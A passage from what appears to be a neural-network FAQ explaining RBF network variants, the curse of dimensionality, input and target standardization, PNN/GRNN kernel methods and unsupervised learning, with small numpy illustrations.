piecewise spherical for RBF units with unequal widths. The larger the
widths, the smoother the isoactivation contours where the pieces join. As
Shorten and Murray-Smith (1996) point out, the activation is not necessarily
a monotone function of distance from the center when unequal widths are
used.

In a NRBFEQ architecture, if each observation is taken as an RBF center, and
if the weights are taken to be the target values, the outputs are simply
weighted averages of the target values, and the network is identical to the
well-known Nadaraya-Watson kernel regression estimator, which has been
reinvented at least twice in the neural net literature (see "What is
GRNN?"). A similar NRBFEQ network used for classification is equivalent to
kernel discriminant analysis (see "What is PNN?").

Kernels with variable widths are also used for regression in the statistical
literature. Such kernel estimators correspond to the NRBFEV
architecture, in which the kernel functions have equal volumes but different
altitudes. In the neural net literature, variable-width kernels appear
always to be of the NRBFEH variety, with equal altitudes but unequal
volumes. The analogy with kernel regression would make the NRBFEV
architecture the obvious choice, but which of the two architectures works
better in practice is an open question.

Hybrid training is not often applied to MLPs because no effective methods
are known for unsupervised training of the hidden units (except when there
is only one input).

Hybrid training will usually require more hidden units than supervised
training. Since supervised training optimizes the locations of the centers,
while hybrid training does not, supervised training will provide a better
approximation to the function to be learned for a given number of hidden
units. Thus, the better fit provided by supervised training will often let
you use fewer hidden units for a given accuracy of approximation than you
would need with hybrid training. And if the hidden-to-output weights are
learned by linear least-squares, the fact that hybrid training requires more
hidden units implies that hybrid training will also require more training
cases for the same accuracy of generalization (Tarassenko and Roberts 1994).

The number of hidden units required by hybrid methods becomes an
increasingly serious problem as the number of inputs increases. In fact, the
required number of hidden units tends to increase exponentially with the
number of inputs. This drawback of hybrid methods is discussed by Minsky and
Papert (1969). For example, with method (1) for RBF networks, you would need
at least five elements in the grid along each dimension to detect a moderate
degree of nonlinearity; so if you have Nx inputs, you would need at least
5^Nx hidden units. For methods (2) and (3), the number of hidden units
increases exponentially with the effective dimensionality of the input
distribution. If the inputs are linearly related, the effective
dimensionality is the number of nonnegligible (a deliberately vague term)
eigenvalues of the covariance matrix, so the inputs must be highly
correlated if the effective dimensionality is to be much less than the
number of inputs.
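
To make the arithmetic concrete, here is a small sketch of both quantities
mentioned above: the 5^Nx grid size, and one possible way of counting
"nonnegligible" eigenvalues. The relative tolerance rel_tol is an arbitrary
choice made for this illustration (the term is deliberately vague, after all),
and the data are synthetic.

```python
import numpy as np

def grid_hidden_units(n_inputs, points_per_dim=5):
    """Hidden units needed for a regular grid of RBF centers."""
    return points_per_dim ** n_inputs

def effective_dimensionality(X, rel_tol=1e-3):
    """Count covariance eigenvalues above rel_tol times the largest one."""
    eigvals = np.linalg.eigvalsh(np.cov(X, rowvar=False))
    return int((eigvals > rel_tol * eigvals.max()).sum())

for n in (1, 2, 3, 5, 10):
    print(n, grid_hidden_units(n))

# Ten highly correlated inputs generated from only two latent variables.
rng = np.random.default_rng(0)
latent = rng.normal(size=(500, 2))
mixing = np.vstack([np.ones(10), np.arange(10) - 4.5])
X = latent @ mixing + 1e-4 * rng.normal(size=(500, 10))

print(effective_dimensionality(X))
```

With ten inputs the grid already needs nearly ten million hidden units, yet
the synthetic data above occupy what is effectively a two-dimensional
subspace.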

The exponential increase in the number of hidden units required for hybrid
learning is one aspect of the curse of dimensionality. The number of
training cases required also increases exponentially in general. No neural
network architecture--in fact no method of learning or statistical
estimation--can escape the curse of dimensionality in general, hence there
is no practical method of learning general functions in more than a few
dimensions.

An additive model is one in which the output is a sum of linear or nonlinear
transformations of the inputs. If an additive model is appropriate, the
number of weights increases linearly with the number of inputs, so high
dimensionality is not a curse. Various methods of training additive models
are available in the statistical literature (e.g. Hastie and Tibshirani
1990). You can also create a feedforward neural network, called a
"generalized additive network" (GAN), to fit additive models (Sarle 1994a).
Additive models have been proposed in the neural net literature under the
name "topologically distributed encoding" (Geiger 1990).

Projection pursuit regression (PPR) provides both universal approximation
and the ability to avoid the curse of dimensionality for certain common
types of target functions (Friedman and Stuetzle 1981). Like MLPs, PPR
computes the output as a sum of nonlinear transformations of linear
combinations of the inputs. Each term in the sum is analogous to a hidden
unit in an MLP. But unlike MLPs, PPR allows general, smooth nonlinear
transformations rather than a specific nonlinear activation function, and
allows a different transformation for each term. The nonlinear
transformations in PPR are usually estimated by nonparametric regression,
but you can set up a projection pursuit network (PPN), in which each
nonlinear transformation is performed by a subnetwork. If a PPN provides an
adequate fit with few terms, then the curse of dimensionality can be
avoided, and the results may even be interpretable.

If the target function can be accurately approximated by projection pursuit,
then it can also be accurately approximated by an MLP with a single hidden
layer. The disadvantage of the MLP is that there is little hope of
interpretability. An MLP with two or more hidden layers can provide a
parsimonious fit to a wider variety of target functions than can projection
pursuit, but no simple characterization of these functions is known.

With proper training, all of the RBF architectures listed above, as well as
MLPs, can process redundant inputs effectively. When there are redundant
inputs, the training cases lie close to some (possibly nonlinear) subspace.
If the same degree of redundancy applies to the test cases, the network need
produce accurate outputs only near the subspace occupied by the data. Adding
redundant inputs has little effect on the effective dimensionality of the
data; hence the curse of dimensionality does not apply, and even hybrid
methods (2) and (3) can be used. However, if the test cases do not follow
the same pattern of redundancy as the training cases, generalization will
require extrapolation and will rarely work well.

MLP architectures are good at ignoring irrelevant inputs. MLPs can also
select linear subspaces of reduced dimensionality. Since the first hidden
layer forms linear combinations of the inputs, it confines the network's
attention to the linear subspace spanned by the weight vectors. Hence,
adding irrelevant inputs to the training data does not increase the number
of hidden units required, although it increases the amount of training data
required.

ORBF architectures are not good at ignoring irrelevant inputs. The number of
hidden units required grows exponentially with the number of inputs,
regardless of how many inputs are relevant. This exponential growth is
related to the fact that ORBFs have local receptive fields, meaning that
changing the hidden-to-output weights of a given unit will affect the output
of the network only in a neighborhood of the center of the hidden unit,
where the size of the neighborhood is determined by the width of the hidden
unit. (Of course, if the width of the unit is learned, the receptive field
could grow to cover the entire training set.)

Local receptive fields are often an advantage compared to the distributed
architecture of MLPs, since local units can adapt to local patterns in the
data without having unwanted side effects in other regions. In a distributed
architecture such as an MLP, adapting the network to fit a local pattern in
the data can cause spurious side effects in other parts of the input space.

However, ORBF architectures often must be used with relatively small
neighborhoods, so that several hidden units are required to cover the range
of an input. When there are many nonredundant inputs, the hidden units must
cover the entire input space, and the number of units required is
essentially the same as in the hybrid case (1) where the centers are in a
regular grid; hence the exponential growth in the number of hidden units
with the number of inputs, regardless of whether the inputs are relevant.

You can enable an ORBF architecture to ignore irrelevant inputs by using an
extra, linear hidden layer before the radial hidden layer. This type of
network is sometimes called an "elliptical basis function" network. If the
number of units in the linear hidden layer equals the number of inputs, the
linear hidden layer performs an oblique rotation of the input space that can
suppress irrelevant directions and differentially weight relevant directions
according to their importance. If you think that the presence of irrelevant
inputs is highly likely, you can force a reduction of dimensionality by
using fewer units in the linear hidden layer than the number of inputs.

Note that the linear and radial hidden layers must be connected in series,
not in parallel, to ignore irrelevant inputs. In some applications it is
useful to have linear and radial hidden layers connected in parallel, but in
such cases the radial hidden layer will be sensitive to all inputs.

For even greater flexibility (at the cost of more weights to be learned),
you can have a separate linear hidden layer for each RBF unit, allowing a
different oblique rotation for each RBF unit.

NRBF architectures with equal widths (NRBFEW and NRBFEQ) combine the
advantage of local receptive fields with the ability to ignore irrelevant
inputs. The receptive field of one hidden unit extends from the center in
all directions until it encounters the receptive field of another hidden
unit. It is convenient to think of a "boundary" between the two receptive
fields, defined as the hyperplane where the two units have equal
activations, even though the effect of each unit will extend somewhat beyond
the boundary. The location of the boundary depends on the heights of the
hidden units. If the two units have equal heights, the boundary lies midway
between the two centers. If the units have unequal heights, the boundary is
farther from the higher unit.

If a hidden unit is surrounded by other hidden units, its receptive field is
indeed local, curtailed by the field boundaries with other units. But if a
hidden unit is not completely surrounded, its receptive field can extend
infinitely in certain directions. If there are irrelevant inputs, or more
generally, irrelevant directions that are linear combinations of the inputs,
the centers need only be distributed in a subspace orthogonal to the
irrelevant directions. In this case, the hidden units can have local
receptive fields in relevant directions but infinite receptive fields in
irrelevant directions.

For NRBF architectures allowing unequal widths (NRBFUN, NRBFEV, and NRBFEH),
the boundaries between receptive fields are generally hyperspheres rather
than hyperplanes. In order to ignore irrelevant inputs, such networks must
be trained to have equal widths. Hence, if you think there is a strong
possibility that some of the inputs are irrelevant, it is usually better to
use an architecture with equal widths.

OLS is a variety of supervised training. But whereas backprop and other
commonly-used supervised methods are forms of continuous optimization, OLS
is a form of combinatorial optimization. Rather than treating the RBF
centers as continuous values to be adjusted to reduce the training error,
OLS starts with a large set of candidate centers and selects a subset that
usually provides good training error. For small training sets, the
candidates can include all of the training cases. For large training sets,
it is more efficient to use a random subset of the training cases or to do a
cluster analysis and use the cluster means as candidates.

"Normalizing" a vector most often means dividing by a norm of the vector,
for example, to make the Euclidean length of the vector equal to one. In the
NN literature, "normalizing" also often refers to rescaling by the minimum
and range of the vector, to make all the elements lie between 0 and 1.

"Standardizing" a vector most often means subtracting a measure of location
and dividing by a measure of scale. For example, if the vector contains
random values with a Gaussian distribution, you might subtract the mean and
divide by the standard deviation, thereby obtaining a "standard normal"
random variable with mean 0 and standard deviation 1.
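
The three operations just described can be sketched as follows. The function
names are made up for this example, and the choice of the sample standard
deviation (ddof=1) as the measure of scale is only one of several reasonable
options.

```python
import numpy as np

def normalize_unit_length(v):
    """Divide by the Euclidean norm so the vector has length one."""
    return v / np.linalg.norm(v)

def normalize_min_range(v):
    """Rescale by minimum and range so all elements lie in [0, 1]."""
    return (v - v.min()) / (v.max() - v.min())

def standardize(v):
    """Subtract the mean and divide by the (sample) standard deviation."""
    return (v - v.mean()) / v.std(ddof=1)

v = np.array([2.0, 4.0, 4.0, 10.0])
print(normalize_unit_length(v))
print(normalize_min_range(v))
print(standardize(v))
```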

There is a common misconception that the inputs to a multilayer perceptron
must be in the interval [0,1]. There is in fact no such requirement,
although there often are benefits to standardizing the inputs as discussed
below. But it is better to have the input values centered around zero, so
scaling the inputs to the interval [0,1] is usually a bad choice.

If your output activation function has a range of [0,1], then obviously you
must ensure that the target values lie within that range. But it is
generally better to choose an output activation function suited to the
distribution of the targets than to force your data to conform to the output
activation function. See "Why use activation functions?"

When using an output activation with a range of [0,1], some people prefer to
rescale the targets to a range of [.1,.9]. I suspect that the popularity of
this gimmick is due to the slowness of standard backprop. But using a target
range of [.1,.9] for a classification task gives you incorrect posterior
probability estimates, and it is quite unnecessary if you use an efficient
training algorithm (see "What are conjugate gradients, Levenberg-Marquardt,
etc.?")

Now for some of the gory details: note that the training data form a matrix.
Let's set up this matrix so that each case forms a row, and the inputs and
target variables form columns. You could conceivably standardize the rows or
the columns or both or various other things, and these different ways of
choosing vectors to standardize will have quite different effects on
training.

Standardizing either input or target variables tends to make the training
process better behaved by improving the numerical condition of the
optimization problem and ensuring that various default values involved in
initialization and termination are appropriate. Standardizing targets can
also affect the objective function.

If the input variables are combined linearly, as in an MLP, then it is
rarely strictly necessary to standardize the inputs, at least in theory. The
reason is that any rescaling of an input vector can be effectively undone by
changing the corresponding weights and biases, leaving you with the exact
same outputs as you had before. However, there are a variety of practical
reasons why standardizing the inputs can make training faster and reduce the
chances of getting stuck in local optima. Also, weight decay and Bayesian
estimation can be done more conveniently with standardized inputs.
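
The claim that rescaling can be undone by the weights and biases is easy to
demonstrate. The sketch below uses a made-up hidden layer with tanh units and
random weights; only the algebra matters, not the particular values.

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(loc=50.0, scale=10.0, size=(20, 3))   # raw inputs
W = rng.normal(size=(3, 4))                          # input-to-hidden weights
b = rng.normal(size=4)                               # hidden biases

mean = X.mean(axis=0)
std = X.std(axis=0)
Xs = (X - mean) / std                                # standardized inputs

# Since X = Xs * std + mean, the net input X @ W + b can be rewritten as
# Xs @ (std[:, None] * W) + (b + mean @ W).
W_s = std[:, None] * W
b_s = b + mean @ W

h_raw = np.tanh(X @ W + b)
h_std = np.tanh(Xs @ W_s + b_s)
print(np.max(np.abs(h_raw - h_std)))   # identical up to rounding
```

So the two networks represent exactly the same function. What differs is how
easy it is for a training algorithm, starting from small random weights, to
find those weights.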

The main emphasis in the NN literature on initial values has been on the
avoidance of saturation, hence the desire to use small random values. How
small these random values should be depends on the scale of the inputs as
well as the number of inputs and their correlations. Standardizing inputs
removes the problem of scale dependence of the initial weights.

But standardizing input variables can have far more important effects on
initialization of the weights than simply avoiding saturation. Assume we
have an MLP with one hidden layer applied to a classification problem and
are therefore interested in the hyperplanes defined by each hidden unit.
Each hyperplane is the locus of points where the net-input to the hidden
unit is zero and is thus the classification boundary generated by that
hidden unit considered in isolation. The connection weights from the inputs
to a hidden unit determine the orientation of the hyperplane. The bias
determines the distance of the hyperplane from the origin. If the bias terms
are all small random numbers, then all the hyperplanes will pass close to
the origin. Hence, if the data are not centered at the origin, the
hyperplane may fail to pass through the data cloud. If all the inputs have a
small coefficient of variation, it is quite possible that all the initial
hyperplanes will miss the data entirely. With such a poor initialization,
local minima are very likely to occur. It is therefore important to center
the inputs to get good random initializations. In particular, scaling the
inputs to [-1,1] will work better than [0,1], although any scaling that sets
to zero the mean or median or other measure of central tendency is likely to
be as good or better.
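
A small simulation illustrates the hyperplane argument. It is only a sketch
under assumed settings: two inputs with mean 100 and standard deviation 1
(a small coefficient of variation), 50 hidden units, and initial weights and
biases drawn uniformly from [-0.1, 0.1]. A hyperplane is counted as passing
through the data cloud if the net input takes both signs among the training
cases.

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(loc=100.0, scale=1.0, size=(200, 2))   # uncentered inputs
Xc = X - X.mean(axis=0)                               # centered inputs

W = rng.uniform(-0.1, 0.1, size=(2, 50))   # small random initial weights
b = rng.uniform(-0.1, 0.1, size=50)        # small random initial biases

def n_hyperplanes_cutting(X, W, b):
    """Number of hidden units whose hyperplane separates at least two cases."""
    net = X @ W + b
    cuts = (net.min(axis=0) < 0) & (net.max(axis=0) > 0)
    return int(cuts.sum())

print("uncentered:", n_hyperplanes_cutting(X, W, b))
print("centered:  ", n_hyperplanes_cutting(Xc, W, b))
```

With the uncentered inputs most of the initial hyperplanes miss the data
entirely; after centering, most of them cut through it.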

Standardizing target variables is typically more a convenience for getting
good initial weights than a necessity. However, if you have two or more
target variables and your error function is scale-sensitive like the usual
least (mean) squares error function, then the variability of each target
relative to the others can affect how well the net learns that target. If
one target has a range of 0 to 1, while another target has a range of 0 to
1,000,000, the net will expend most of its effort learning the second target
to the possible exclusion of the first. So it is essential to rescale the
targets so that their variability reflects their importance, or at least is
not in inverse relation to their importance. If the targets are of equal
importance, they should typically be standardized to the same range or the
same standard deviation.
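
The effect of target scale on a sum-of-squares error can be seen by computing
each target's share of the total error for a trivial predictor that outputs
the target means. The two synthetic targets below mimic the ranges in the
example above; the helper name sse_share is made up for this sketch.

```python
import numpy as np

rng = np.random.default_rng(0)
T = np.column_stack([
    rng.uniform(0.0, 1.0, size=1000),          # target with range 0 to 1
    rng.uniform(0.0, 1_000_000.0, size=1000),  # target with range 0 to 1,000,000
])

def sse_share(T):
    """Fraction of the total squared error contributed by each target
    when the prediction is simply the mean of that target."""
    resid = T - T.mean(axis=0)
    sse = (resid ** 2).sum(axis=0)
    return sse / sse.sum()

T_std = (T - T.mean(axis=0)) / T.std(axis=0)

print(sse_share(T))      # the second target accounts for nearly everything
print(sse_share(T_std))  # equal shares after standardizing
```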

The scaling of the targets does not affect their importance in training if
you use maximum likelihood estimation and estimate a separate scale
parameter (such as a standard deviation) for each target variable. In this
case, the importance of each target is inversely related to its estimated
scale parameter. In other words, noisier targets will be given less
importance.

For weight decay and Bayesian estimation, the scaling of the targets affects
the decay values and prior distributions. Hence it is usually most
convenient to work with standardized targets.

Standardization of cases should be approached with caution because it
discards information. If that information is irrelevant, then standardizing
cases can be quite helpful. If that information is important, then
standardizing cases can be disastrous. Issues regarding the standardization
of cases must be carefully evaluated in every application. There are no
rules of thumb that apply to all applications.

You may want to standardize each case if there is extraneous variability
between cases. Consider the common situation in which each input variable
represents a pixel in an image. If the images vary in exposure, and exposure
is irrelevant to the target values, then it would usually help to subtract
the mean of each case to equate the exposures of different cases. If the
images vary in contrast, and contrast is irrelevant to the target values,
then it would usually help to divide each case by its standard deviation to
equate the contrasts of different cases. Given sufficient data, a NN could
learn to ignore exposure and contrast. However, training will be easier and
generalization better if you can remove the extraneous exposure and contrast
information before training the network.
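
For the image example, standardizing each case might look like the sketch
below. The "images" are synthetic 64-pixel vectors sharing one underlying
pattern but differing in exposure (an additive shift) and contrast (a positive
multiplicative factor); both the data and the function name are assumptions
made for illustration.

```python
import numpy as np

def standardize_cases(X):
    """Standardize each row (case): subtracting the row mean removes exposure,
    dividing by the row standard deviation removes contrast.
    A constant row would give a zero standard deviation and must be handled
    separately; that case is not covered here."""
    Xc = X - X.mean(axis=1, keepdims=True)
    return Xc / Xc.std(axis=1, keepdims=True)

rng = np.random.default_rng(0)
pattern = rng.normal(size=64)
bright_high_contrast = 3.0 * pattern + 40.0
dim_low_contrast = 0.5 * pattern + 5.0

X = np.vstack([bright_high_contrast, dim_low_contrast])
Z = standardize_cases(X)
print(np.max(np.abs(Z[0] - Z[1])))   # the two cases now coincide
```

Note that the same operation would be disastrous if exposure or contrast
carried information about the target, since that information is gone after
standardizing.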

As another example, suppose you want to classify plant specimens according
to species but the specimens are at different stages of growth. You have
measurements such as stem length, leaf length, and leaf width. However, the
over-all size of the specimen is determined by age or growing conditions,
not by species. Given sufficient data, a NN could learn to ignore the size
of the specimens and classify them by shape instead. However, training will
be easier and generalization better if you can remove the extraneous size
information before training the network. Size in the plant example
corresponds to exposure in the image example.

If the data are measured on a ratio scale, you can control for size by
dividing each datum by a measure of over-all size. It is common to divide by
the sum or by the arithmetic mean. For positive ratio data, however, the
geometric mean is often a more natural measure of size than the arithmetic
mean. It may also be more meaningful to analyze the logarithms of positive
ratio-scaled data, in which case you can subtract the arithmetic mean after
taking logarithms. You must also consider the dimensions of measurement. For
example, if you have measures of both length and weight, you may need to
cube the measures of length or take the cube root of the weights.
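
For positive ratio-scaled data, the two size adjustments mentioned above are
closely related, as this sketch shows. The measurements (stem length, leaf
length, leaf width) are invented numbers, and the second specimen is simply
the first one scaled up by a factor of three.

```python
import numpy as np

def divide_by_geometric_mean(X):
    """Divide each case by the geometric mean of its measurements."""
    gm = np.exp(np.log(X).mean(axis=1, keepdims=True))
    return X / gm

def log_then_center(X):
    """Take logarithms, then subtract each case's arithmetic mean."""
    L = np.log(X)
    return L - L.mean(axis=1, keepdims=True)

small_plant = np.array([[10.0, 4.0, 2.0]])
large_plant = 3.0 * small_plant          # same shape, three times the size

print(divide_by_geometric_mean(small_plant))
print(divide_by_geometric_mean(large_plant))   # same as the line above
print(log_then_center(small_plant))
```

Subtracting the mean after taking logarithms gives exactly the logarithm of
the data divided by the geometric mean, so both approaches remove over-all
size and keep shape.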

Most importantly, nonlinear transformations of the targets matter when the
data are noisy, because they change the error function. Many commonly used
error functions are functions solely of the difference abs(target-output).
Nonlinear transformations (unlike linear transformations) change the
relative sizes of these differences. With most error functions, the net will
expend more effort, so to speak, trying to learn target values for which
abs(target-output) is large.

For example, suppose you are trying to predict the price of a stock. If the
price of the stock is 10 (in whatever currency unit) and the output of the
net is 5 or 15, yielding a difference of 5, that is a huge error. If the
price of the stock is 1000 and the output of the net is 995 or 1005,
yielding the same difference of 5, that is a tiny error. You don't want the
net to treat those two differences as equally important. By taking
logarithms, you are effectively measuring errors in terms of ratios rather
than differences, since a difference between two logs corresponds to the
ratio of the original values. This has approximately the same effect as
looking at percentage differences, abs(target-output)/target or
abs(target-output)/output, rather than simple differences.
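
The stock-price numbers above work out as follows. This is just the
arithmetic of the example; the function names are made up.

```python
import math

def abs_error(target, output):
    return abs(target - output)

def log_error(target, output):
    """Absolute difference of logarithms, i.e. the log of the ratio."""
    return abs(math.log(target) - math.log(output))

def pct_error(target, output):
    return abs(target - output) / target

cases = [(10.0, 5.0), (10.0, 15.0), (1000.0, 995.0), (1000.0, 1005.0)]
for target, output in cases:
    print(target, output,
          abs_error(target, output),
          round(log_error(target, output), 4),
          round(pct_error(target, output), 4))
```

All four cases have the same simple difference of 5, but on the log scale the
errors for the cheap stock are over a hundred times larger than those for the
expensive one, much as the percentage differences suggest.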

It is usually advisable to choose an error function appropriate for the
distribution of noise in your target variables (McCullagh and Nelder 1989).
But if your software does not provide a sufficient variety of error
functions, then you may need to transform the target so that the noise
distribution conforms to whatever error function you are using. For example,
if you have to use least-(mean-)squares training, you will get the best
results if the noise distribution is approximately Gaussian with constant
variance, since least-(mean-)squares is maximum likelihood in that case.
Heavy-tailed distributions (those in which extreme values occur more often
than in a Gaussian distribution, often as indicated by high kurtosis) are
especially of concern, due to the loss of statistical efficiency of
least-(mean-)square estimates (Huber 1981). Note that what is important is
the distribution of the noise, not the distribution of the target values.

ART stands for "Adaptive Resonance Theory", invented by Stephen Grossberg in
1976. ART encompasses a wide variety of neural networks based explicitly on
neurophysiology. ART networks are defined algorithmically in terms of
detailed differential equations intended as plausible models of biological
neurons. In practice, ART networks are implemented using analytical
solutions or approximations to these differential equations.

PNN or "Probabilistic Neural Network" is Donald Specht's term for kernel
discriminant analysis. You can think of it as a normalized RBF network in
which there is a hidden unit centered at every training case. These RBF
units are called "kernels" and are usually probability density functions
such as the Gaussian. The hidden-to-output weights are usually 1 or 0; for
each hidden unit, a weight of 1 is used for the connection going to the
output that the case belongs to, while all other connections are given
weights of 0. Alternatively, you can adjust these weights for the prior
probabilities of each class. So the only weights that need to be learned are
the widths of the RBF units. These widths (often a single width is used) are
called "smoothing parameters" or "bandwidths" and are usually chosen by
cross-validation or by more esoteric methods that are not well-known in the
neural net literature; gradient descent is not used.
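
A minimal sketch of a PNN along these lines, assuming Gaussian kernels with a
single common bandwidth, follows. The function name, the tiny data set, and
the default of using class frequencies as prior probabilities are all
assumptions made for illustration; the bandwidth is simply given rather than
chosen by cross-validation.

```python
import numpy as np

def pnn_predict(X_train, y_train, X_test, bandwidth, priors=None):
    """Kernel discriminant analysis with one Gaussian kernel per training case.
    Returns predicted classes and estimated posterior probabilities.
    If a test case is so far from all training cases that every kernel
    underflows to zero, the posteriors are undefined (NaN)."""
    classes = np.unique(y_train)
    d2 = ((X_test[:, None, :] - X_train[None, :, :]) ** 2).sum(axis=2)
    K = np.exp(-d2 / (2.0 * bandwidth ** 2))
    # Class-conditional density estimates, up to a constant common to all classes.
    dens = np.column_stack([K[:, y_train == c].mean(axis=1) for c in classes])
    if priors is None:
        priors = np.array([(y_train == c).mean() for c in classes])
    post = dens * priors
    post = post / post.sum(axis=1, keepdims=True)
    return classes[post.argmax(axis=1)], post

X_train = np.array([[0.0, 0.0], [0.0, 1.0], [5.0, 5.0], [5.0, 6.0]])
y_train = np.array([0, 0, 1, 1])
X_test = np.array([[0.2, 0.4], [5.1, 5.4]])

labels, post = pnn_predict(X_train, y_train, X_test, bandwidth=1.0)
print(labels)
print(post)
```

Notice that every prediction touches every training case, which is the source
of the speed concerns discussed next.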

Specht's claim that a PNN trains 100,000 times faster than backprop is at
best misleading. While they are not iterative in the same sense as backprop,
kernel methods require that you estimate the kernel bandwidth, and this
requires accessing the data many times. Furthermore, computing a single
output value with kernel methods requires either accessing the entire
training data or clever programming, and either way is much slower than
computing an output with a feedforward net. And there are a variety of
methods for training feedforward nets that are much faster than standard
backprop. So depending on what you are doing and how you do it, PNN may be
either faster or slower than a feedforward net.

PNN is a universal approximator for smooth class-conditional densities, so
it should be able to solve any smooth classification problem given enough
data. The main drawback of PNN is that, like kernel methods in general, it
suffers badly from the curse of dimensionality. PNN cannot ignore irrelevant
inputs without major modifications to the basic algorithm. So PNN is not
likely to be the top choice if you have more than 5 or 6 nonredundant
inputs.

But if all your inputs are relevant, PNN has the very useful ability to tell
you whether a test case is similar (i.e. has a high density) to any of the
training data; if not, you are extrapolating and should view the output
classification with skepticism. This ability is of limited use when you have
irrelevant inputs, since the similarity is measured with respect to all of
the inputs, not just the relevant ones.

GRNN or "General Regression Neural Network" is Donald Specht's term for
Nadaraya-Watson kernel regression, also reinvented in the NN literature by
Schiøler and Hartmann. You can think of it as a normalized RBF network in
which there is a hidden unit centered at every training case. These RBF
units are called "kernels" and are usually probability density functions
such as the Gaussian. The hidden-to-output weights are just the target
values, so the output is simply a weighted average of the target values of
training cases close to the given input case. The only weights that need to
be learned are the widths of the RBF units. These widths (often a single
width is used) are called "smoothing parameters" or "bandwidths" and are
usually chosen by cross-validation or by more esoteric methods that are not
well-known in the neural net literature; gradient descent is not used.
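
Here is a sketch of a GRNN, again assuming Gaussian kernels with a single
bandwidth, together with a simple leave-one-out cross-validation error that
could be used to compare candidate bandwidths. The function names, the
noise-free sine data, and the list of candidate bandwidths are all
illustrative assumptions.

```python
import numpy as np

def grnn_predict(X_train, y_train, X_test, bandwidth):
    """Nadaraya-Watson kernel regression: a kernel-weighted average of targets."""
    d2 = ((X_test[:, None, :] - X_train[None, :, :]) ** 2).sum(axis=2)
    K = np.exp(-d2 / (2.0 * bandwidth ** 2))
    return (K @ y_train) / K.sum(axis=1)

def loo_cv_error(X, y, bandwidth):
    """Leave-one-out mean squared error: each case is predicted
    from all the other cases by zeroing its own kernel weight."""
    d2 = ((X[:, None, :] - X[None, :, :]) ** 2).sum(axis=2)
    K = np.exp(-d2 / (2.0 * bandwidth ** 2))
    np.fill_diagonal(K, 0.0)
    pred = (K @ y) / K.sum(axis=1)
    return float(np.mean((y - pred) ** 2))

X = np.linspace(0.0, 1.0, 50)[:, None]
y = np.sin(2.0 * np.pi * X[:, 0])

for bw in (0.01, 0.05, 0.2, 1.0):
    print(bw, loo_cv_error(X, y, bw))

pred = grnn_predict(X, y, X, bandwidth=0.05)
```

Because the output is a weighted average with positive weights, it can never
fall outside the range of the training targets, and with a very large
bandwidth it collapses to the mean of the targets.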

GRNN is a universal approximator for smooth functions, so it should be able
to solve any smooth function-approximation problem given enough data. The
main drawback of GRNN is that, like kernel methods in general, it suffers
badly from the curse of dimensionality. GRNN cannot ignore irrelevant inputs
without major modifications to the basic algorithm. So GRNN is not likely to
be the top choice if you have more than 5 or 6 nonredundant inputs.

Unsupervised learning allegedly involves no target values. In fact, for most
varieties of unsupervised learning, the targets are the same as the inputs
(Sarle 1994). In other words, unsupervised learning usually performs the
same task as an auto-associative network, compressing the information from
the inputs (Deco and Obradovic 1996). Unsupervised learning is very useful
for data visualization (Ripley 1996), although the NN literature generally
ignores this application.

Unsupervised competitive learning is used in a wide variety of fields under
a wide variety of names, the most common of which is "cluster analysis" (see
the Classification Society of North America's web site for more information
on cluster analysis, including software, at http://www.pitt.edu/~csna/.) The
main form of competitive learning in the NN literature is vector
quantization (VQ, also called a "Kohonen network", although Kohonen invented
several other types of networks as well--see "How many kinds of Kohonen
networks exist?" which provides more references on VQ). Kosko (1992) and
Hecht-Nielsen (1990) review neural approaches to VQ, while the textbook by
Gersho and Gray (1992) covers the area from the perspective of signal
processing. In statistics, VQ has been called "principal point analysis"
(Flury, 1990, 1993; Tarpey et al., 1994) but is more frequently encountered
in the guise of k-means clustering. In VQ, each of the competitive units
corresponds to a cluster center (also called a codebook vector), and the
error function is the sum of squared Euclidean distances between each
training case and the nearest center. Often, each training case is
normalized to a Euclidean length of one, which allows distances to be
simplified to inner products. The more general error function based on
distances is the same error function used in k-means clustering, one of the
most common types of cluster analysis (MacQueen 1967; Anderberg 1973). The
k-means model is an approximation to the normal mixture model (McLachlan and
Basford 1988) assuming that the mixture components (clusters) all have
spherical covariance matrices and equal sampling probabilities. Normal
mixtures have found a variety of uses in neural networks (e.g., Bishop
1995). Balakrishnan, Cooper, Jacob, and Lewis (1994) found that k-means
algorithms used as normal-mixture approximations recover cluster membership
more accurately than Kohonen algorithms.
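
The VQ error function, and one step of the usual batch k-means update that
reduces it, can be sketched as follows. This is the batch (Lloyd-style)
version rather than an on-line competitive learning rule, the data are
random, and the initial codebook is simply the first three cases; all of
these are choices made only for illustration.

```python
import numpy as np

def vq_error(X, centers):
    """Sum of squared Euclidean distances from each case to its nearest center."""
    d2 = ((X[:, None, :] - centers[None, :, :]) ** 2).sum(axis=2)
    return float(d2.min(axis=1).sum())

def kmeans_step(X, centers):
    """Assign each case to its nearest center, then move each center
    to the mean of the cases assigned to it."""
    d2 = ((X[:, None, :] - centers[None, :, :]) ** 2).sum(axis=2)
    nearest = d2.argmin(axis=1)
    new_centers = centers.copy()
    for k in range(len(centers)):
        members = X[nearest == k]
        if len(members) > 0:       # an empty cluster keeps its old center
            new_centers[k] = members.mean(axis=0)
    return new_centers

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 2))
centers = X[:3].copy()

errors = [vq_error(X, centers)]
for _ in range(10):
    centers = kmeans_step(X, centers)
    errors.append(vq_error(X, centers))
print(errors)
```

Each step can only decrease the error or leave it unchanged, which is why the
procedure converges, although only to a local minimum.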

Hebbian learning is the other most common variety of unsupervised
learning (Hertz, Krogh, and Palmer 1991). Hebbian learning minimizes the
same error function as an auto-associative network with a linear hidden
layer, trained by least squares, and is therefore a form of dimensionality
reduction. This error function is equivalent to the sum of squared distances
between each training case and a linear subspace of the input space (with
distances measured perpendicularly), and is minimized by the leading
principal components (Pearson 1901; Hotelling 1933; Rao 1964; Jolliffe 1986;
Jackson 1991; Diamantaras and Kung 1996). There are variations of Hebbian
learning that explicitly produce the principal components (Hertz, Krogh, and
Palmer 1991; Karhunen 1994; Deco and Obradovic 1996; Diamantaras and Kung
1996).
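
The error function in question can be computed directly. The sketch below
does not implement a Hebbian learning rule; it obtains the principal
components from a singular value decomposition and compares the resulting
subspace with an arbitrary random subspace of the same dimension. The data
and the choice of a two-dimensional subspace are illustrative.

```python
import numpy as np

def subspace_error(Xc, basis):
    """Sum of squared perpendicular distances from the rows of Xc to the
    subspace spanned by the orthonormal columns of basis."""
    projection = Xc @ basis @ basis.T
    return float(((Xc - projection) ** 2).sum())

rng = np.random.default_rng(0)
X = rng.normal(size=(300, 5)) @ rng.normal(size=(5, 5))
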